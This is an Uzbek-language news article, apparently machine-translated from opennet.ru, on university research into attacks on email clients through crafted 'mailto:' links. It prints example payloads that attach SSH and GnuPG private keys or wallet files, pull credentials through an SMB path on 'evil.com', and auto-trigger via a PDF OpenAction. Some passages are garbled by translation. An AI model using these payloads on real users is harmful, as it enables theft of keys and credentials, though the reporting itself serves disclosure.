“mailto:” havolalari yordamida elektron pochta mijozi foydalanuvchilariga hujum qilish

Bochum Ruhr universiteti tadqiqotchilari (Germaniya) tahlil qilindi (PDF) kengaytirilgan parametrlarga ega "mailto:" havolalarini qayta ishlashda pochta mijozlarining xatti-harakati. Tekshirilgan yigirmata elektron pochta mijozidan beshtasi “birikish” parametri yordamida resurslarni almashtirishni boshqaradigan hujumga qarshi himoyasiz edi. Qo'shimcha oltita elektron pochta mijozi PGP va S/MIME kalitlarini almashtirish hujumiga, uchta mijoz esa shifrlangan xabarlar mazmunini chiqarish hujumiga qarshi himoyasiz edi.

Havolalar «Mailto:"havolada ko'rsatilgan adresatga xat yozish uchun elektron pochta mijozini ochishni avtomatlashtirish uchun ishlatiladi. Manzilga qo'shimcha ravishda siz havolaning bir qismi sifatida qo'shimcha parametrlarni belgilashingiz mumkin, masalan, xat mavzusi va odatiy tarkib uchun shablon. Taklif etilayotgan hujum "birikish" parametrini boshqaradi, bu sizga yaratilgan xabarga qo'shimchani biriktirish imkonini beradi.

Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) va Pegasus Mail pochta mijozlari sizga avtomatik ravishda biriktirish imkonini beruvchi ahamiyatsiz hujumga qarshi himoyasiz edi. “mailto:?attach=path_to_file” kabi havola orqali belgilangan har qanday mahalliy fayl. Fayl ogohlantirishsiz biriktirilgan, shuning uchun alohida e'tiborsiz foydalanuvchi xatning ilova bilan yuborilishini sezmasligi mumkin.

Masalan, “mailto” kabi havoladan foydalanish:[elektron pochta bilan himoyalangan]&subject=Title&body=Matn&attach=~/.gnupg/secring.gpg" siz GnuPG-dan shaxsiy kalitlarni xatga kiritishingiz mumkin. Shuningdek, siz kripto hamyonlar (~/.bitcoin/wallet.dat), SSH kalitlari (~/.ssh/id_rsa) va foydalanuvchi uchun ochiq bo'lgan har qanday fayllar tarkibini yuborishingiz mumkin. Bundan tashqari, Thunderbird “attach=/tmp/*.txt” kabi konstruksiyalardan foydalanib, fayllar guruhlarini niqob yordamida biriktirishga imkon beradi.

Mahalliy fayllarga qo'shimcha ravishda, ba'zi elektron pochta mijozlari IMAP serveridagi tarmoq xotirasi va yo'llariga havolalarni qayta ishlaydi. Xususan, IBM Notes “attach=\\evil.com\dummyfile” kabi havolalarni qayta ishlashda faylni tarmoq katalogidan oʻtkazish, shuningdek, tajovuzkor tomonidan boshqariladigan SMB serveriga havola yuborish orqali NTLM autentifikatsiya parametrlarini ushlab turish imkonini beradi. (so'rov joriy autentifikatsiya parametrlari foydalanuvchisi bilan yuboriladi).

Thunderbird IMAP serveridagi papkalardan kontent biriktirish imkonini beruvchi “attach=imap:///fetch>UID>/INBOX>1/” kabi soʻrovlarni muvaffaqiyatli qayta ishlaydi. Shu bilan birga, OpenPGP va S/MIME orqali shifrlangan IMAP’dan olingan xabarlar jo‘natishdan oldin pochta mijozi tomonidan avtomatik ravishda shifrlanadi. Thunderbird-ni ishlab chiquvchilar edi xabardor qilingan fevral oyida muammo haqida va sonida Thunderbird 78 muammo allaqachon tuzatilgan (Thunderbird 52, 60 va 68 shoxlari zaifligicha qolmoqda).

Thunderbird-ning eski versiyalari tadqiqotchilar tomonidan taklif qilingan PGP va S/MIME-dagi boshqa ikkita hujum variantiga ham zaif edi. Xususan, Thunderbird, shuningdek, OutLook, PostBox, eM Client, MailMate va R2Mail2 kalitlarni almashtirish hujumiga uchradi, bu esa pochta mijozi S/MIME xabarlarida uzatiladigan yangi sertifikatlarni avtomatik ravishda import qilishi va o'rnatishi tufayli yuzaga kelgan. tajovuzkor foydalanuvchi tomonidan allaqachon saqlangan ochiq kalitlarni almashtirishni tashkil qiladi.

Thunderbird, PostBox va MailMate sezgir bo'lgan ikkinchi hujum, qoralama xabarlarni avtomatik saqlash mexanizmining xususiyatlarini manipulyatsiya qiladi va mailto parametrlaridan foydalanib, shifrlangan xabarlarning shifrini ochish yoki o'zboshimchalik bilan xabarlar uchun raqamli imzo qo'shishni boshlash imkonini beradi. natijani tajovuzkorning IMAP serveriga keyinchalik uzatish. Ushbu hujumda shifrlangan matn "tana" parametri orqali uzatiladi va "meta refresh" tegi tajovuzkorning IMAP serveriga qo'ng'iroqni boshlash uchun ishlatiladi. Masalan: ' '

“Mailto:” havolalarini foydalanuvchi ishtirokisiz avtomatik tarzda qayta ishlash uchun maxsus ishlab chiqilgan PDF hujjatlaridan foydalanish mumkin - PDF-dagi OpenAction amali hujjatni ochishda mailto ishlov beruvchisini avtomatik ravishda ishga tushirish imkonini beradi:

%PDF-1.5
1 0 obj
<< /Tur /Katalog /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Tur /Action /S /URI/URI (mailto:?body=—— PGP MESSAGENI BOSHLASH——[…])>>
endobj

"mailto:" havolalari yordamida elektron pochta mijozi foydalanuvchilariga hujum qilish

Manba: opennet.ru

a Izoh qo'shish